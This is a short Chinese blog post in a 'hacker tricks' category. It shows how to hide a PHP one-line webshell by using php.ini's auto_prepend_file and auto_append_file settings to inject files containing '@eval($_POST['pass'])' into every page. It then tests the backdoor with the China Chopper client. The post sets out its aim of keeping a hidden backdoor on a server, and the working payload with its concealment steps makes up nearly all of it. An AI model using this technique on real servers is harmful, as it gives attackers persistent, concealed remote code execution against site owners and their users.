利用php.ini隐藏一句话

作者:Secer 发布时间:July 4, 2013 分类:黑客技巧

利用php中的一个自动在文件中增加页眉和页脚的功能,隐藏一句话

在站点的某一目录(如:根目录)下编辑文件php脚本文件,名称为:info.php,内容如下
<?php
Phpinfo();
?>
在本地打开如:http://127.0.0.1/info.php
检查系统使用的配置文件
clip_image001

找到并编辑该配置文件
如下行:
auto_prepend_file =test.php  #自动将“test.php”中的内容增加到任意文件的页眉位置
auto_append_file =fuck.php  #自动将“test.php”中的内容增加到任意文件的页脚位置
如果是unix则修改如下两行
; UNIX: "/path1:/path2"
;include_path = ".:/php/includes"
我使用的是windows
; Windows: "\path1;\path2"
include_path = "E:\PHPnow-1.5.6\htdocs;."#指定php 中的包含函数首先搜索的路径为“E:\PHPnow-1.5.6\htdocs”然后才是“.”即根。
在“E:\PHPnow-1.5.6\htdocs”创建名称(名称随意,上下保持一致即可)为“test.php”和“fuck.php”的脚本文件,其中包含最关键的一句话内容如下:
<?php
@eval($_POST['pass']);      #pass 是密码
?>
使用caidao进行测试,如下:

clip_image002

clip_image004

clip_image006
这样就可以完成使用“php.ini”达到留后门的目的

标签: 一句话

添加新评论 »